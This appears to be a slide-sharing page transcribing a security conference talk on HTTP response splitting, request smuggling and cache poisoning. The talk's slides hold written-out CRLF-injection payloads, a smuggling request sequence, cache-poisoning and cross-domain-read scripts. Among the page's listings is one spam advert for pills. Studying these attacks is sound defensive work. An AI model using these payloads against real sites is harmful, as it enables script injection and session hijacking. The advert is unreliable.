Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23
 
Miasm defcon russia 23
Miasm defcon russia 23Miasm defcon russia 23
Miasm defcon russia 23
 
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
 

Dernier

Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingEdi Saputra
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 

Dernier (20)

Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 

Vladimir Vorontsov - Splitting, smuggling and cache poisoning come back

  • 2. HTTP Response Splitting • Injection part of HTTP response to response from HTTP request. https://www.owasp.org/index.php/CRLF_Injection http://dl.packetstormsecurity.net/papers/general/whitepaper_ httpresponse.pdf http://www.derkeiler.com/Mailing- Lists/securityfocus/bugtraq/2002-05/0077.html
  • 3. HTTP Response Splitting /redir_lang.jsp?lang=foobar%0d%0aContentLength:%200%0d%0a%0 d%0aHTTP/1.1 %20200%20OK%0d%0aContentType:%20text/html%0d%0aContentL ength:%2019%0d%0a%0d%0a<html>Shazam</html> This results in the following output stream, sent by the web server over the TCP connection: HTTP/1.1 302 Moved Temporarily Date: Wed, 24 Dec 2003 15:26:41 GMT Location: http://10.1.1.1/by_lang.jsp?lang=foobar Content-Length: 0 HTTP/1.1 200 OK Content-Type: text/html Content-Length: 19 <html>Shazam</html> * Example from http://dl.packetstormsecurity.net/papers/general/ whitepaper_httpresponse.pdf
  • 4. PHP prevent splitting >=5.1.2, >=4.4.2 http://blog.php-security.org/archives/28-Goodbye-HTTP- Response-Splitting,-and-thanks-for-all-the-fish.html Goodbye HTTP Response Splitting, and thanks for all the fish //Thursday, January 12. 2006, Steffan Esser /* new line safety check */ char *s = header_line, *e = header_line + header_line_len, *p; while (s < e && (p = memchr(s, 'n', (e - s)))) { if (*(p + 1) == ' ' || *(p + 1) == 't') { s = p + 1;continue; } efree(header_line); sapi_module.sapi_error(E_WARNING, "Header may not contain more than a single header, new line detected."); return FAILURE; }
  • 5. Why CRLF (%0d%0a) ??? http://www.w3.org/Protocols/rfc2616/rfc2616- sec6.html#sec6: After receiving and interpreting a request message, a server responds with an HTTP response message. Response = Status-Line ; Section 6.1 *(( general-header ; Section 4.5 | response-header ; Section 6.2 | entity-header ) CRLF) ; Section 7.1 CRLF [ message-body ] ; Section 7.2
  • 6. And what about real browsers? #!/usr/bin/perl ... my $proto = getprotobyname('tcp'); my $servaddr = sockaddr_in(8080, INADDR_ANY); socket SERVER, PF_INET, SOCK_STREAM, $proto or die "Unable to create socket: $!"; bind SERVER, $servaddr or die "Unable to bind: $!"; listen SERVER, 10; my $answ = "HTTP/1.1 200 OK".chr(13)."Set-cookie: cook1=dsa" for(my $i=0; $i<255; $i++){ $answ.=chr($i)."Set-cookie: cook-$i=OK"; $answ .="rnrn<h1>Chrome 13</h1>"; } print "Server running on port $port...n"; while (accept CONNECTION, SERVER) { ...
  • 7. And what about real browsers? • It is possible to bypass PHP header() function and do injection (except Firefox). • It is possible to split the Responce in Internet Explorer 8/9
  • 8. Example #1. IE splitting (PHP all) <?php header("Location: ".$_GET['r']); ?> ?r=f%0dContent- Length:111%0d<html>%0d<script>alert(11)</script>
  • 9. Smuggling classic http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf 01 POST http://SITE/foobar.html HTTP/1.1 02 Host: SITE 03 Connection: Keep-Alive 04 Content-Type: application/x-www-form-urlencoded 05 Content-Length: 0 06 Content-Length: 44 07 [CRLF] 08 GET /poison.html HTTP/1.1 09 Host: SITE 10 Bla: [space after the "Bla:", but no CRLF] 11 GET http://SITE/page_to_poison.html HTTP/1.1 12 Host: SITE 13 Connection: Keep-Alive 14 [CRLF]
  • 10. Smuggling like header injections • Restrictions manipulations: foobar%0dAccess-Control-Allow-Origin: *; foobar%0dX-FRAME-OPTIONS: ALLOW-FROM attacker; foobar%0dX-XSS-Protection: 0; foobar%0dX-Content-Security-Policy: allow http://*:80; • Session fixation foobar:%0dSet- Cookie:PHPSESSID=FAKED%0dLocation=/auth.php • Scripting/HTML injection foobar:%0dRefresh: 1;url=data:text/html,<script>alert(1)</script>
  • 11. Cache poisoning • Web server cache • Proxy server cache • Browser cache http://www.securityfocus.com/archive/ 1/434931 http://www.eecs.berkeley.edu/~yahel/ papers/Browser-Cache-Poisoning.Song.Spring10.attack- project.pdf http://www.eecs.berkeley.edu/~yahel/papers/Quantifying-Persistent- Browser-Cache-Poisoning.CS294-50.Song.Spring10.pdf
  • 12. Cache poisoning classic http://dl.packetstormsecurity.net/papers/general/whitepaper _httpresponse.pdf (2004) Web servers, proxies and browser specified technics In exampe - IE 6 SP1 way: var r = new ActiveXObject("Microsoft.XMLHTTP"); r.open("GET","http://10.1.1.1/index.html",false); r.setRequestHeader("Pragma","no-cache"); r.send(); r.open("GET","http://10.1.1.1/SetLang.aspx?lang=%0d%0aContentLength:%200%0d %0a%0d%0aHTTP/1.1%20200%20 OK%0d%0aLastModified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT %0d%0aConte nt-Length:%2020%0d%0aContentType:%20text/html %0d%0a%0d%0a<html>Hacked!</html>",false); r.send(); r.open("GET","http://10.1.1.1/index.html",false); r.send();
  • 13. Header injection & cache poising • foobar%0dCache-Control: fake • foobar%0dExpires: fake • foobar%0dLast-Modified: fake Which file is sweetest to poison? • /index.php ? • /auth.php ? • /private-data.php?
  • 14. Which file is sweetest to poison? CROSSDOMAIN.XML http://www.adobe.com/devnet/ articles/crossdomain_policy_ file_spec.html http://learn.adobe.com/wiki/ download/attachments/ 64389123/CrossDomain_ PolicyFile_Specification.pdf ?version=1
  • 15. Smuggling for non-HTTP PROTOCOLS?! M.Zalewski: The Tangled Web. http://www.nostarch.com/download/tangledweb_ch3.pdf GET /<html><body><h1>Hi! HTTP/1.1 Host: example.com:25 ... 220 example.com ESMTP 500 5.5.1 Invalid command: "GET /<html><body><h1>Hi! HTTP/1.1" 500 5.1.1 Invalid command: "Host: example.com:25" ... 421 4.4.1 Timeout
  • 16. Smuggling for non-HTTP PROTOCOLS?! Port restrictions (Chrome) http://www.google.com/codesearch#wZuuyuB8jKQ/ chromium/src/net/base/net_util.cc&exact_package= chromiumos&q=IsPortAllowedByDefault&type=cs&l=1564 1,7,9,11,13,15,17,19-23,25,37,42,43,53,77,79,87,95,101- 104,109- 11,113,115,117,119,123,135,139,143,179,389,465,512- 515,526,530- 532,540,556,563,587,601,636,993,995,2049,3659,4045, 6000,6665-6669
  • 17. Smuggling for non-HTTP PROTOCOLS?! Proxy server's response normalization Echo server example #1 (direct connection): > GET /<h1>O</h1> HTTP/1.1 < GET /<h1>O</h1> HTTP/1.1 ... connection never closed - timeout - no output Echo server example #2 (proxy connection): > GET /<h1>O</h1> HTTP/1.1 < GET /<h1>O</h1> HTTP/1.1 ... Proxy timeout, GET /<h1>O</h1> HTTP/1.1 output
  • 18. Internet Explorer 8/9 bonus =) Domains in security zone with level "Low" and "Medium" access to any cross-domain data... <html> <script> function aa(url){ var client = new XMLHttpRequest(); client.open("GET", url,true); client.send(); client.onreadystatechange = function() { if(this.readyState == 2) alert(client.responseText); } } aa("http://mail.yandex.ru"); </script> </html>